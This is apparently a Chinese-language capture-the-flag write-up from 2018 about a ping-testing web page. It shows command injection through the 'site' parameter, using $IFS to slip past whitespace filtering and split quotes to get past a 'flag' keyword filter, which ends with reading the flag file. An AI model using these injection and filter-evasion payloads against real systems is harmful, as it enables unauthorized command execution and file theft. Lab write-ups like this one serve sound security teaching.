xp0int Posted on Oct 31 2018 (比赛题目可能有改动,做法没变) 首先是一个网络测试页面。  随便填点东西。   出现?site=what的GET参数,猜测功能是输入一个ip或域名进行执行ping命令。  尝试命令注入。 输入localhost&&ls:  输入localhost&&ls /etc:  结果相同,可能是因为把空白字符之后的内容删除了。 输入localhost&&ls\$IFS/etc (\$IFS变量储存了一个空白字符):  命令正常执行了。 输入localhost&&ls\$IFS/:  发现flag文件。 尝试读取,localhost&&cat\$IFS/flag:  应该是服务器拦截了flag字符串, 把路径分割来绕过,localhost&&cat\$IFS/fl''ag:  flag{P1ng_10c41h0st_c4t_f14g} 打赏还是打残,这是个问题 赏 Wechat Pay Alipay [Math] C8: captcha [Web]fakelogin2
没有帐号? 立即注册